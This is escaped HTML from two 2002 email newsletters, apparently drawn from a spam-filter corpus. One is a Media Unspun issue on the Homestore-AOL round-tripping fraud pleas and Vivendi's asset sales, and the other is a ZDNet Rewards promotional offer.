 		&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 1 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table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HREF="#a96666"
 						class="a269926923523143-contents_article_title"
 				&gt;
 			AOL Keyword: Fraud Probe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HREF="#a96667"
 						class="a269926923521810-contents_article_title"
 				&gt;
 			Vivendi Meets the New Boss
 			&lt;/a&gt;&lt;/font&gt;
 			&lt;br&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;img src="http://www.imakenews.com/eletra/empty.gif" height="1" width="1"&gt;&lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 			&lt;font face="Verdana,Arial" size="1"&gt;
 				&lt;A HREF="#a96668"
 						class="a269926923521810-contents_article_title"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Editor's Note
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Is Media Unspun useful to you? Then pass it on to a colleague. The more readers we have, the more successful we'll be. The more successful we are, the more useful we can be to you. Pass it on!&lt;/P&gt;&lt;P&gt;
 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&lt;P&gt;Pop!Tech 2002&lt;br&gt;
 October 18 - 20, 2002: Camden, Maine&lt;br&gt;
 Join 500 big thinkers to discuss&lt;br&gt;
 the collision of technology and culture&lt;br&gt;
 Register now at: &lt;A HREF="http://www.poptech.org"&gt;http://www.poptech.org&lt;/A&gt; &lt;br&gt;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name="a96666"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			AOL Keyword: Fraud Probe
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Another three bite the dust. Three former executives from real estate dot-com Homestore have agreed to plead guilty to criminal charges and repay $4.6 million in stock gains. What's more interesting is that they'll cooperate with an investigation into AOL's role in the dubious dealing. This is the most real estate drama you'll get this week without renting "Glengarry Glen Ross."&lt;/P&gt;&lt;P&gt;
 Homestore's former COO was charged with wire fraud and conspiracy to commit securities fraud (up to 10 years in jail), the former CFO with just the conspiracy charge (up to five years), and an ex-VP with insider trading (less time, but unknown). The big accusation here is "round tripping," in which Homestore would buy goods from a company as long as the company then spent most of the money on AOL ads. Then AOL would supposedly spend the same amount of money at Homestore, "thus allowing
 Homestore effectively to 'buy' revenue using its own cash," explained the Wall Street Journal.&lt;/P&gt;&lt;P&gt;
 Homestore has become a cause celebre for Attorney General John Ashcroft, who held a press conference to emphasize that the Bush administration really means it about this corporate clean-up thing. Neither Ashcroft, the Justice Department, nor the SEC named names, referring only to Homestore's relationship with "a major media company." Nice try for anonymity, but AOL Time Warner was the only major media company Homestore dealt with, observed the New York Times. Now the heat's on AOL while
 investigators try and figure out how much of AOL's revenue was inflated like a Thanksgiving Day Parade float.&lt;br&gt;
  &lt;br&gt;
 The L.A. Times' sources said AOL execs pointed the finger at former company dealmaker Eric Keller. The Journal led with, and expanded on, this info. It seems two of the three busted Homestore execs are expected to say Keller helped Homestore do its round-tripping, and that some AOL ad revenue that looked legit on paper really came from Homestore. Keller has already been pink-slipped for shady deals with Homestore and another company; his boss got booted last month for possible book-cooking.
 &lt;/P&gt;&lt;P&gt;
 So where's the perp walk? The umbrella stand? The theatrics that make the corporate crime beat great? We're kidding (mostly), but that could be why overseas outlets barely noticed this comparatively tame example of American excess. The Journal had one amusing tidbit, though: After Keller got fired, AOL vice chairman Ted Leonsis hired him as a consultant for the hockey team the Washington Capitals, of which Leonsis is the majority owner. Leonsis said he let Keller go after finding out why he
 lost his AOL job, but Keller still picked up his Capitals phone as of Wednesday. As outrageous severance packages go, it's no Jack Welsh/GE $9 million annual pension, but it'll have to do. - Jen Muehlbauer&lt;/P&gt;&lt;P&gt;
 Homestore Executives Agree to Guilty Pleas &lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A3165-2002Sep25.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A3165-2002Sep25.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Homestore, AOL Ad Deals Yield Guilty Pleas (USA Today)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1nbz"&gt;http://tinyurl.com/1nbz&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 U.S. Focuses on Executive at Homestore&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/09/26/technology/26AOL.html"&gt;http://www.nytimes.com/2002/09/26/technology/26AOL.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Homestore's Ex-Execs to Aid Investigators&lt;br&gt;
 &lt;A HREF="http://www.latimes.com/business/la-fi-homestore26sep26,0,5107257.story"&gt;http://www.latimes.com/business/la-fi-homestore26sep26,0,5107257.story&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Probe of Homestore Turns To an Ex-AOL Executive&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB1032971619118707713,00.html"&gt;http://online.wsj.com/article/0,,SB1032971619118707713,00.html&lt;/A&gt; &lt;br&gt;
 (Paid registration required.)&lt;/P&gt;&lt;P&gt;
 Jack Welch's Very Golden Years &lt;br&gt;
 &lt;A HREF="http://www.fool.com/news/Take/2002/mft/mft02090903.htm"&gt;http://www.fool.com/news/Take/2002/mft/mft02090903.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Glengarry Glen Ross &lt;br&gt;
 &lt;A HREF="http://us.imdb.com/Title?0104348"&gt;http://us.imdb.com/Title?0104348&lt;/A&gt; &lt;/P&gt;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&lt;P&gt;What's Really Going on at Microsoft? Mary Jo Foley delivers unmatched reporting and insight with MICROSOFT WATCH.  Track initiatives like .Net, Palladium, Longhorn, Trinity, Yukon; release dates, competitive moves, people. For a FREE 14-day trial subscription:&lt;br&gt;
 &lt;A HREF="https://ziffdavis.omeda.com/zm/msw/msw.cgi?intro2&amp;p=5UCXA00075"&gt;https://ziffdavis.omeda.com/zm/msw/msw.cgi?intro2&amp;p=5UCXA00075&lt;/A&gt; &lt;/P&gt;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name="a96667"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Vivendi Meets the New Boss
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;What does Vivendi want to be when it grows up? The media can't figure it out. Can CEO Jean-Ren&amp;eacute; Fourtou? His fuzziness at yesterday's board meeting got reporters to wondering. If he can't explain his vision, does that mean he's lacking the 20/20 clarity that observers on two continents were banking on? For Fourtou, worse than the Monsieur Magoo accusations are the comparisons, starting to bubble through media accounts, that he resembles -- wait, we're rubbing our eyes -- the
 vilified Jean-Marie Messier.&lt;/P&gt;&lt;P&gt;
 Media watchers can rate reporters' confusion over Fourtou's latest pronouncements by tallying the amount of space outlets devoted to their coverage of the mess. The New York Times ran 24 paragraphs on the board meeting -- and then filed another 19 in an analysis that sought to examine what the latest moves meant.  The Financial Times posted two articles on the meeting and still had more to say, lambasting Fourtou in Lex, the peach paper's influential column. Lex called the exec's update "more
 like a rambling fireside chat ... than a strategy presentation."&lt;/P&gt;&lt;P&gt;
 There's little that's clear about what's ahead for Vivendi. The company now says that it will dispose of 12 billion euros worth of assets over the next 18 months. Here's how reporters examining the tea leaves read the current plan: Out are Telepiu, an Italian pay-TV operation, and Canal Plus Technologies, a maker of set-top boxes. On the way out are Vivendi's publishing properties, which include Houghton Mifflin, and a minority stake in a PC gamemaker. That leaves Vivendi's stake in telecom,
 via its Cegetel investment, and its Universal entertainment properties, and -- hey, wait a minute, wasn't that Messier's plan, the New York Times wondered by way of an analyst's quote. To confuse matters further, News Corp., the alleged partner in the done deal for Telepiu, says no deal is in place, according to the Financial Times. As for Cegetel, Fourtou said he'd consider selling Vivendi's 44% stake; then again, maybe he'll increase it. And that was all in one post-meeting telephone
 conference. &lt;/P&gt;&lt;P&gt;
 The only decision by Vivendi in which Fourtou seemed sure was his claim that the company won't pay any severance to Messier. "He enjoyed making deals too much and overpaid," the Guardian quoted Fourtou as saying, and then adding, "This all went to his head." &lt;/P&gt;&lt;P&gt;
 With heads other than Messier's now in question, is Vivendi's viability again in doubt? Outlets today report that Enron's logo, the oversize capital "E" that stood outside its headquarters, sold at auction for $44,000. How many euros might a V bring? - Deborah Asbrand&lt;/P&gt;&lt;P&gt;
 Vivendi Will Move Quickly to Sell Many Assets&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/09/26/business/26VIVE.html"&gt;http://www.nytimes.com/2002/09/26/business/26VIVE.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 What's New at Vivendi? Depends Who's Talking&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/09/26/business/26PLAC.html"&gt;http://www.nytimes.com/2002/09/26/business/26PLAC.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Vivendi in Move to Sell Raft of Assets (Financial Times)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1ncq"&gt;http://tinyurl.com/1ncq&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Vivendi Board to Deny Messier Severance Pay (Financial Times)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1ncs"&gt;http://tinyurl.com/1ncs&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Lex: Vivendi Universal (Financial Times) &lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1ncw"&gt;http://tinyurl.com/1ncw&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 News Corp Counters Report of Telepiu Sale (Financial Times)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1ncy"&gt;http://tinyurl.com/1ncy&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Vivendi Aims to Realise Eu12bn from Asset Sales (Daily Telegraph)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1nd0"&gt;http://tinyurl.com/1nd0&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Messier 'won't get a penny' &lt;br&gt;
 &lt;A HREF="http://media.guardian.co.uk/city/story/0,7497,799283,00.html"&gt;http://media.guardian.co.uk/city/story/0,7497,799283,00.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Vivendi Shakes Up Board, Denies Messier's Severance&lt;br&gt;
 &lt;A HREF="http://www.latimes.com/business/la-fi-vivendi26sep26,0,481695.story"&gt;http://www.latimes.com/business/la-fi-vivendi26sep26,0,481695.story&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Enron Auctions Off Furniture and Famous 'E'&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/09/26/business/26ENRO.html"&gt;http://www.nytimes.com/2002/09/26/business/26ENRO.html&lt;/A&gt; &lt;/P&gt;
 					&lt;br&gt;
 			&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 	&lt;a name="a96668"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Other Stories
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;HP Boosts Layoffs By 1,800&lt;br&gt;
 &lt;A HREF="http://www.siliconvalley.com/mld/siliconvalley/4151819.htm"&gt;http://www.siliconvalley.com/mld/siliconvalley/4151819.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Former WorldCom Controller To Plead Guilty To Two counts (Wall Street Journal)&lt;br&gt;
 &lt;A HREF="http://www.msnbc.com/news/813048.asp"&gt;http://www.msnbc.com/news/813048.asp&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Tyco Rewarded an Executive During a Grand Jury Inquiry&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/09/26/business/26PAY.html"&gt;http://www.nytimes.com/2002/09/26/business/26PAY.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Bell Labs Researcher Falsified Experiments (AP)&lt;br&gt;
 &lt;A HREF="http://www.chron.com/cs/CDA/story.hts/tech/news/1591103"&gt;http://www.chron.com/cs/CDA/story.hts/tech/news/1591103&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Germany's Neuer Markt to close&lt;br&gt;
 &lt;A HREF="http://news.bbc.co.uk/2/hi/business/2283068.stm"&gt;http://news.bbc.co.uk/2/hi/business/2283068.stm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Resources Dry Up As Joblessness Drags On (USA Today)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1nc1"&gt;http://tinyurl.com/1nc1&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Merrill Aide to Plead Guilty (Wall Street Journal)&lt;br&gt;
 &lt;A HREF="http://www.msnbc.com/news/813195.asp?0dm=B21AB"&gt;http://www.msnbc.com/news/813195.asp?0dm=B21AB&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Enron Ex-CFO Clears His Throat For Feds &lt;br&gt;
 &lt;A HREF="http://www.nypost.com/business/57905.htm"&gt;http://www.nypost.com/business/57905.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Music Labels Seek Piracy Payback&lt;br&gt;
 &lt;A HREF="http://www.latimes.com/business/la-fi-napster26sep26001431,0,388519.story"&gt;http://www.latimes.com/business/la-fi-napster26sep26001431,0,388519.story&lt;/A&gt; &lt;/P&gt;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Marketing: Cowpoke Productions (&lt;a href="http://www.cowpokeproductions.com"&gt;cowpokeproductions.com&lt;/a&gt;).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value="http://newsletter.mediaunspun.com/index000020868.cfm"&gt;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 &lt;font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&lt;!-- 3,4:article_view --&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="4" bgcolor="#FFFFFF"&gt;
 &lt;tr&gt;&lt;td
 bgcolor="#000000"&gt;
 	&lt;font face="arial" size="2" color="#FFFFFF"&gt;&lt;b&gt;
 		&lt;CENTER&gt;Advertisement&lt;/CENTER&gt;
 	&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#FFFFFF"&gt;
 	&lt;TABLE bgcolor="#FFFFFF" border="0" cellpadding="3" cellspacing="0" width="100%"&gt;
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 				&lt;a href="http://www.poptech.org"&gt;&lt;img src="http://a298.g.akamai.net/7/298/5382/092602092354/www.imakenews.com/mediaunspun/mediaunspun_e_a000089486.JPG" BORDER="0" alt="" hspace="5" vspace="1" align="top"&gt;&lt;/a&gt;
 				&lt;br&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 3 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table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000020868.cfm&amp;XXDESXXissue_id=20868&amp;XXDESXXtitle=Media%20Unspun"
 			 class="a269926923549919-footer_tellafriend"&gt;
 			&lt;font size=4&gt;Tell a Friend...&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;/td&gt;
 	  &lt;/tr&gt;
 	&lt;/table&gt;&lt;/div&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 4 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;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zzz-unspun@example.com &lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@example.com"&gt;Click here&lt;/a&gt; to be instantly removed from this list.&lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@example.com%2Ctxt"&gt;Click here&lt;/a&gt; to receive future messages in plain text format.&lt;br&gt;&lt;/font&gt;&lt;font face="verdana,arial" size="1"&gt;&lt;a
 href="http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@example.com"&gt;Click here&lt;/a&gt; to change your subscriber information and preferences.&lt;br&gt;&lt;/font&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!--Ver. 7--&gt;
 		&lt;p&gt;&amp;nbsp;
        &lt;img src="http://machina.imakenews.com/E215207,5114587XXmediaunspunXX20868XXXXindex000020868.cfmXXemailXX5114587XXXX0Y0XX1" alt="" height="0" width="0"&gt;		 
 		&lt;/p&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------------=_1033046883-23957-4--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get the Perfect Mix of ZDNet's Best Stuff!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;body style="margin:8px 9px 9px 12px" bgcolor="#ffffff" background="http://techupdate.zdnet.com/techupdate/i/bg_232850.gif" link="#003399" alink="#cc0000" vlink="#666699"&gt;&lt;HEAD&gt; 
 &lt;TITLE&gt;ZDNet Announcements&lt;/TITLE&gt;
 &lt;div align="center"&gt;
 &lt;A name=top&gt;&lt;/A&gt;
 &lt;TABLE bgColor=#232850 border=0 cellPadding=0 cellSpacing=0 width=624&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=bottom&gt;
     &lt;TD width=624&gt;&lt;IMG alt="" height=53 src="http://www.zdnet.com/graphics/newsletters/hd_announcement.gif" width=624&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;table width="624" border="0" cellspacing="0" cellpadding="0"&gt;
 &lt;TBODY&gt;
 &lt;tr&gt;
 &lt;td width="1" rowspan="2" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="7" alt="" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;td width="622" height="6" colspan="3" bgcolor="#1E5C99"&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="6" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;td width="1" rowspan="2" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="7" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="10" height="1" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1" alt="" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;td width="600" height="1" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="600" height="1" alt="" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;td width="10" height="1" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1" alt="" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/TBODY&gt;
 &lt;/table&gt;
 &lt;TABLE bgColor=#232850 border=0 cellPadding=0 cellSpacing=0 width=624&gt;
   &lt;TBODY&gt;
   &lt;TR bgColor=#ffffef&gt;
     &lt;TD bgColor=#83A3CB rowSpan=2 width=1&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD bgColor=#1E5C99 rowSpan=2 width=10&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD bgColor=#000000 rowSpan=2 width=1&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;
       &lt;TD align=middle height=32 width=600&gt;&amp;nbsp;&lt;/TD&gt;
     &lt;TD bgColor=#000000 rowSpan=2 width=1&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD bgColor=#1E5C99 rowSpan=2 width=10&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD bgColor=#83A3CB rowSpan=2 width=1&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD bgColor=#cccccc&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE bgColor=#ffffff border=0 cellPadding=0 cellSpacing=0 width=624&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD bgColor=#83A3CB width=1&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD bgColor=#1E5C99 width=10&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD bgColor=#000000 width=1&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;
       &lt;TD width=600&gt;&lt;FONT color=#333333 face="verdana, geneva" 
       size=-2&gt;&amp;nbsp;&lt;SUP&gt;&amp;nbsp;&lt;/SUP&gt; 
         &lt;!-- date --&gt;
         July 10, 2002 
         &lt;!-- /date --&gt;
         &lt;/FONT&gt;&lt;BR&gt;
         &lt;!-- ### promo content ### --&gt;
       &lt;TABLE align=center width=580&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
             &lt;TD&gt; 
               &lt;p align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="4" color="#FF3333"&gt;&lt;b&gt;Exclusive 
                 Offer for ZDNet&lt;/b&gt;&lt;/font&gt; &lt;font face="Arial, Helvetica, sans-serif" size="4" color="#FF3333"&gt;&lt;b&gt; 
                 Members... &lt;br&gt;
                 &lt;/b&gt;&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkHvFTl_BKqBxDVAmoBameR" &gt;&lt;img src="http://cma.zdnet.com/graphics/zdnet_rewards_bug.gif" width="139" height="40" border="0" alt="Click Here to Visit ZDNet Rewards!"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;br&gt;
                 &lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="4" color="#FF3333"&gt;&lt;b&gt;Now 
                 40% off! &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;Dear 
                 ZDNet Member:&lt;/font&gt;&lt;/FONT&gt; &lt;/p&gt;
               &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Just a quick 
                 note to let you know that your ZDNet membership now qualifies 
                 you for a special 40% discount on &lt;b&gt;ZDNet&lt;font color="ff3333"&gt; 
                 Rewards&lt;/font&gt;&lt;/b&gt;, our advanced tech service! Join &lt;b&gt;ZDNet&lt;font color="ff3333"&gt; 
                 Rewards&lt;/font&gt;&lt;/b&gt; and you get all &lt;br&gt;
                 these great benefits:&lt;/font&gt;&lt;/p&gt;
               &lt;ul&gt;
                 &lt;li&gt; 
                   &lt;div align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;Interactive 
                     Web design classes:&lt;/b&gt; learn online, at your own pace&lt;/font&gt;&lt;/div&gt;
                 &lt;/li&gt;
                 &lt;li&gt; 
                   &lt;div align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;Subscription 
                     to Computer Shopper magazine&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                 &lt;/li&gt;
                 &lt;li&gt; 
                   &lt;div align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Access 
                     to ZDNet's private tech research center&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
                 &lt;/li&gt;
                 &lt;li&gt; 
                   &lt;div align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;Members-only 
                     online forum&lt;/b&gt; for expert PC guidance and support&lt;/font&gt;&lt;/div&gt;
                 &lt;/li&gt;
                 &lt;li&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;WebFerretPRO: 
                   &lt;/b&gt; a FULL copy of the ultimate Web search utility&lt;/font&gt;&lt;/li&gt;
                 &lt;li&gt; 
                   &lt;div align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;And 
                     more&lt;/b&gt;... &lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXFQCUpdA98BbBL7kOi_yR" &gt;&lt;b&gt;try 
                     it now!&lt;/b&gt;&lt;/a&gt; &lt;/font&gt;&lt;/div&gt;
                 &lt;/li&gt;
               &lt;/ul&gt;
               &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Try &lt;b&gt;ZDNet&lt;font color="ff3333"&gt; 
                 Rewards&lt;/font&gt;&lt;/b&gt; for a full month for just $1 -- and if you 
                 love using these advanced features, you can become a full member 
                 for 40% off the regular cost! Go here for all the details:&lt;/font&gt;&lt;/p&gt;
               &lt;table width="80%" border="2" align="center" cellpadding="10" bordercolor="#000000" bgcolor="#FFFFCC"&gt;
                 &lt;tr&gt; 
                   &lt;td&gt; 
                     &lt;div align="center"&gt; 
                       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rXOrxdzmlKMZ2Fz8IR7XlR" &gt;Join 
                         today and get your first month for just $1!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt; 
                     &lt;/div&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Thanks for 
                 being a part of ZDNet, the premier technology community. &lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;-- The ZDNet 
                 team&lt;br&gt;
                 &lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;&lt;br&gt;
                 &lt;/font&gt;&lt;/p&gt;
               &lt;/TD&gt;
           &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- ### /promo content ### --&gt;&lt;/TD&gt;
     &lt;TD bgColor=#000000 width=1&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD bgColor=#1E5C99 width=10&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD bgColor=#83A3CB width=1&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=624&gt;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width="624"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href='http://clickthru.online.com/Click?q=2f-hYfFzInu3VK3rWHE2V22j7XLQtJgVRRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtYMOux7kEMLKlXBDgnVsR" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=59-y53oIEnthMcOgNglpW-B_KMqztFR"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width=624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width=624 cellpadding=0 cellspacing=0 border=0&gt;&lt;tr bgcolor="#1E5C99"&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10&gt;&lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 &lt;td width=75&gt;&lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES2bizmb4QA5K-fxuEL59R" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
